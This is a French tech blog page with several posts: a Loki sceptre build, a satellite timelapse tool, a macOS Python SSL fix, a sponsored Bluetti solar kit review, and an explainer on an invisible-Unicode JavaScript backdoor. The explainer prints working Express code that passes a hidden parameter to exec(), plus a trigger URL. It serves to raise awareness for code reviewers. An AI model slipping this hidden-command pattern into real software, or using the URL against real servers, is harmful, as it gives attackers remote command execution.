Mise à jour de la base de données, veuillez patienter...

J’ai beaucoup aimé la série Loki sur Disney+ et si vous ne l’avez pas vu, je vous la recommande.

Très cool ce petit sceptre. Ça m’aurait bien servi ce weekend pour désintégrer quelques relous. Mais en attendant, je vais me consoler avec ce projet de sceptre imprimé en 3D qui détecte les mouvements et fait du son comme dans le film. Ainsi, si vous bossez sur un cosplay de Loki ou d’un des personnages de la série, c’est forcément le truc à avoir.

Le tuto a été mis au point par les frères Ruiz, et toutes les étapes sont décrites ici, avec également le code Python qui va bien. Le montage utilise un Feather M4 et PropMaker FeatherWing programmé avec le langage CircuitPython.

Je trouve le rendu super propre ! On dirait un vrai, même si malheureusement, on ne peut désintégrer personne avec celui-là. Cependant, je suis sûr qu’on peut y ajouter un petit taser.

Vous vous passionnez pour les images satellites et vous aimeriez bien faire un timelapse d’une zone particulière de la planète pour montrer son évolution ?

Et bien avec Streamlit c’est possible. Le principe est simple. Vous sélectionnez une zone sur la carte, vous exportez cette zone dans un fichier json. Vous réimportez ensuite ce json, vous choisissez une collection d’images satellites et vous cliquez sur le bouton « Submit ».

Et voilà, vous aurez un joli GIF animé ou MP4 à télécharger. Je vous laisse regarder les vidéos pour voir ce que ça donne.

Des chercheurs du cabinet de consultig Certitude, ont mis au point une backdoor (porte dérobée) qui ne peut pas être détectée, car elle utilise un caractère Unicode invisible. La technique n’est pas nouvelle, mais c’est une bonne piqûre de rappel (c’est la mode en ce moment, les rappels).

Celui-ci peut ainsi être interprété comme une variable dans un bout de code JavaScript. En effet, à partir de la version 2015 d’ECMAScript, tous les caractères Unicode ayant la propriété « ID_Start » peuvent être utilisés dans des variables ou des constantes.

Ainsi, le caractère « ㅤ » (0x3164 en hexadécimal) qu’on appelle également « HANGUL FILLER » est considéré comme une lettre et possède cette propriété « ID_Start ».

Il ne reste plus qu’à l’utiliser dans du code JavaScript en échappant le caractère comme ceci :

const { timeout,\u3164} = req.query;

Ainsi, dans ce code, on ne passe pas uniquement 1 paramètre « timeout » dans la requête, mais 2 paramètres : timeout et notre caractère Unicode invisible.

Ainsi, quand on observe ce code :

const express = require('express');
const util = require('util');
const exec = util.promisify(require('child_process').exec);

const app = express();

app.get('/network_health', async (req, res) => {
    const { timeout,ㅤ} = req.query;
    const checkCommands = [
        'ping -c 1 google.com',
        'curl -s http://example.com/',ㅤ
    ];

    try {
        await Promise.all(checkCommands.map(cmd => 
                cmd && exec(cmd, { timeout: +timeout || 5_000 })));
        res.status(200);
        res.send('ok');
    } catch(e) {
        res.status(500);
        res.send('failed');
    }
});

app.listen(8080);

On peut voir que le caractère est appelé à 2 endroits. Je les ai mis en gras. Sur Visual Studio c’est un peu plus voyant, car ces caractères forment des carrés jaunes (lignes 8 et 11).

Chaque élément du tableau, les commandes en dur et le paramètre fourni par l’utilisateur du script sont ensuite transmis à la fonction exec qui exécute les commandes au niveau du système d’exploitation.

Grâce à notre caractère invisible, on peut lui passer une commande bonus comme ceci en ajoutant le paramètre 0x3164 URL-encoded, ce qui donne %E3%85%A4 :

http://host:8080/network_health?%E3%85%A4=METTEZ-ICI-NIMPORTE-QUELLE-COMMANDE

Et voilà, la commande supplémentaire sera alors exécutée sur le système.

Ainsi, la détection de ce genre de code invisible dépendra vraiment de l’éditeur utilisé pour afficher le code. Comme vous avez pu le voir, sous Visual Studio c’est visible, mais subtil.

Dans le même genre, il est également possible de tromper l’auditeur d’un code avec des caractères qui se ressemblent. Par exemple, ce symbole “ǃ” n’est pas un point d’exclamation, mais un caractère Unicode appelé ALVEOLAR CLICK. Vous retrouverez l’ensemble de ces codes baptisés « Confusables » ici.

Vous trouverez tous les détails concernant cette technique ici.

Voici une petite erreur que j’ai rencontrée dernièrement sous macOS au moment de lancer un script Python développé par mes soins.

ssl.SSLCertVerificationError: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: unable to get local issuer certificate (_ssl.c:1129)

Je me suis bien sûr demandé d’où ça venait, car je n’avais pas modifié mon code. Peut-être une mise à jour de Python. Quoiqu’il en soit, j’ai trouvé la solution, donc je la partage ici en espérant que ça serve à certains. En tout cas, je le note pour moi, histoire que la prochaine fois je perde moins de temps.

Donc si vous rencontrez cette erreur, rendez vous dans le dossier des /Applications de macOS. Localisez le répertoire Python et ouvrez-le.

À l’intérieur, vous verrez un script baptisé « Install Certificates.command ». Il vous suffit alors de double cliquer dessus pour que celui-ci s’exécute et mettre à jour les certificats SSL nécessaires à Python.

Oui, c’est aussi simple que ça.

— Article en partenariat avec Bluetti —

Salut les amis, j’espère que ce début d’année commence bien pour vous et que vous profitez bien des cadeaux que vous avez trouvés au pied du sapin ! De mon côté j’ai pu profiter d’un gros colis envoyé par la société Bluetti : des panneaux solaires et une station de charge ! Autant vous dire que le survivaliste qui dort en moi a frétillé comme un œuf dans sa poêle.

Qui est Bluetti ?

Pour ceux qui ne savent pas vraiment ce que propose la société, je vous fais un petit topo rapide. L’idée de la boite c’est de proposer des sources d’électricité portable et simple à mettre en place ainsi qu’à utiliser. Du panneau solaire mobile pour vous dépanner dans toutes les situations et vous offrir plus de liberté, sans être dépendant d’aucun réseau. Le tout avec un niveau de maintenance très faible (rien à démonter ou à entretenir). De quoi intéresser tous ceux qui veulent vivre en ermite autonomie.

Le petit plus de la société c’est qu’elle développe entièrement tout son matériel, de la carte mère aux contrôleurs, des coques en passant par les onduleurs, etc. Tout est fait maison, ce ne sont pas des composants en marque blanche venus de l’on ne sait où et avec des garanties de fiabilité aléatoires. Pour la petite histoire, tout a démarré il y a quelques années via une campagne de crowdfunding.

OK, maintenant que c’est fait, passons à la présentation de ce qu’ils m’ont envoyé.

Les panneaux solaires : Bluetti SP200 200W

Premier constat lorsque j’ai pris la chose en main : c’est plutôt compact et léger (quelques kg). Cela se présente un peu comme un tapis de gymnastique pliant (environs 2m20 sur 50 cm de haut) qu’il suffit de déplier pour utiliser. Vous avez également des supports qui permettent de soutenir les 4 panneaux indépendamment les uns des autres, il est donc possible d’avoir différentes inclinaisons pour chacun (ce qui serait plus efficace).

Pour ce qui concerne l’aspect technique, Bluetti annonce une puissance de sortie à 95% et une puissance de 200 watts et un rendement des cellules de 23% (cellules en silicium monocristallin). Difficile de vérifier ces éléments sans matériel adéquat (ce que je n’ai pas).

Évidemment les panneaux sont fabriqués en matériaux durables, résistent à la pluie (traitement anticorrosion), mais aussi aux déchirures et autres rayures. Un connecteur et un câble MC4 sont livrés avec et il est possible de connecter plusieurs panneaux en série si vous avez besoin de plus de puissance.

Temps de mise en place : 3 minutes max, fingers in the nose.

La station de charge : Bluetti AC50S

Il suffit de raccorder le câble des panneaux à la station de charge Bluetti AC50S et d’appuyer sur un bouton pour qu’il commence à charger. Effectuer une charge complète prend environ 6 heures selon l’ensoleillement, l’heure de la journée, etc. (peut-être moins en été lorsque le soleil tape plus fort ? Je vous dirai ça dans quelques mois).

Avec ses batteries 500Wh au lithium, son onduleur 300w et sa dizaine de prises (2 AC 220-240v, 2 DC 12v/3A, 4 USB A, 1 USB C … plus un adaptateur) il permet de connecter plusieurs appareils à la fois. Il y a même un chargeur sans fil sur le dessus (pour le smartphone). Il dispose aussi d’un petit écran LCD qui permet de voir l’état de la charge et d’une lampe LED intégrée pour ne pas vous perdre dans le noir.

Comme vous le voyez sur la photo vous pouvez le déplacer très facilement via les poignées, et pour la taille c’est sensiblement la même qu’une grosse radio de notre jeunesse (la vôtre, moi j’ai toujours 18 ans) en un peu plus lourd. Niveau couleur, il existe en bleu et en orange.

Niveau sécurité, si le générateur passe en mode surcharge le groupe électrogène se met directement en protection (fonction SOS), aucun risque de voir votre abri de jardin propulsé dans l’espace en cas d’explosion 😉 L’appareil dispose également d’un système de refroidissement interne (ventilateurs sur les côtés).

Ce que j’ai aussi trouvé assez sympa c’est le peu de bruit que produit l’appareil, c’est discret donc en intérieur ça passe. À noter aussi que la station se recharge non seulement via panneaux solaires, mais aussi depuis une prise de courant classique ou l’allume-cigare de la voiture (les câbles sont fournis, c’est toujours sympa). Bluetti annonce un cycle de vie de plus de 1000 charges.

Niveau des prix le combo reçu tourne autour des 1000 €. Toutefois pour ceux qui veulent, voici un code promo qui vous donne le droit à 100 euros de réduction jusqu’au 31/01/2022 : LUOHUA2 à utiliser sur la boutique Bluetti.

Il y a des solutions moins chères (panneaux solaires 120W au lieu de 200w par exemple) et surtout beaucoup plus chères si vous vous tournez vers des solutions plus puissantes, tout en 1 avec écran tactile, à multiples panneaux solaires, etc.

Que peut-on faire avec un tel système ?

Vous pouvez bien entendu recharger ou utiliser tous vos appareils :

• smartphone, laptop
• drone, appareil photo, routeur
• tout appareil disposant d’un port USB
• enceintes, ventilateur
• cafetière, glacière
• télévision (ahhh regarder le Tour de France au fin fond de la forêt)
• masque respiratoire (pour ceux qui font de l’apnée du sommeil)
• tout autres appareils consommant jusqu’à 300w/heure
• …

Pour vous faire une idée, voici à quoi correspond plus ou moins une charge complète en termes de chiffres concrets : une 40-aine de charges d’un smartphone, 2 jours de lumière faible intensité, une demi-journée d’un mini-frigo, entre 7 et 10 charges de laptop …

Le premier autre avantage auquel j’ai pensé c’est que cela permet de générer un surplus d’électricité de manière ponctuelle ou dans une zone précise. Par exemple pour un cabanon au fond de votre terrain pour lequel vous ne voulez pas faire tirer 200m de câble ni payer une intervention qui coûterait plus cher que le prix des appareils.

Le second c’est bien entendu la portabilité. Pouvoir l’emporter partout avec vous est vraiment pratique dans plusieurs situations : pour les vacances, le camping, si vous menez la van life ou êtes toujours en déplacement, pour générer un surplus d’électricité lors d’un évènement ou d’une soirée en extérieur, pour ne pas dépendre que d’une charge de batterie des outils lorsque vous travaillez loin d’une source d’électricité, etc. 

Utile en cas de panne de courant à la maison. Vous aurez toujours une solution de secours sous la main, plus robuste que les bougies (zavez déjà essayé de recharger votre téléphone à la bougie, c’est long). Vu que le système ne génère pas de bruit ni de fumée, qu’il n’y a pas de combustion d’essence, etc., c’est une solution plutôt safe à utiliser en intérieur.

Le sport. Si vous n’avez pas d’haltères chez vous, vous pouvez toujours vous entraîner à soulever plusieurs fois le groupe électrogène et faire des sauts par-dessus les panneaux. Ben quoi ? Je suis un être humain créatif :p

Mon avis

Alors la luminosité en ce moment, la charge n’a pas été très rapide, mais j’ai vraiment hâte de tester dès qu’il y aura un peu plus de soleil. Le côté portable de la station me permet de l’emmener à l’autre bout du jardin pour pouvoir ensuite y brancher une lampe, une enceinte voire une petite pompe. J’aime beaucoup également la zone de recharge sans fil au-dessus de l’appareil ce qui me permet de charger mon iPhone sans me prendre la tête.

Je n’ai pas encore eu l’occasion de l’emmener dans la voiture, mais si je pratiquais le camping ou la van life, ce serait royal. J’ai essayé de faire tourner le purificateur d’air de Dyson dessus, mais sans surprise, ça n’a pas fonctionné. Je pense que ça tire trop de jus.

Niveau environnement j’avoue ne pas trop savoir ou poser le curseur. D’un côté pouvoir générer de l’énergie renouvelable de cette manière, sans pollution et sur le long terme est une bonne chose. De l’autre il faudrait savoir quel est l’impact écologique dû à la fabrication des différents composants du système et la durée de vie du matériel. Il faudrait donc une étude détaillée et sur la durée pour être fixé.

En attendant ça me fait bien délirer d’apprendre un peu comment fonctionne ce type de système, d’avoir un peu plus d’autonomie en énergie et de vivre avec moins de stress en cas de panne ou de facture EDF impayée 😉

Il va vite devenir mon meilleur ami cet été pour bosser au fond des bois 🙂

Découvrez les produits Bluetti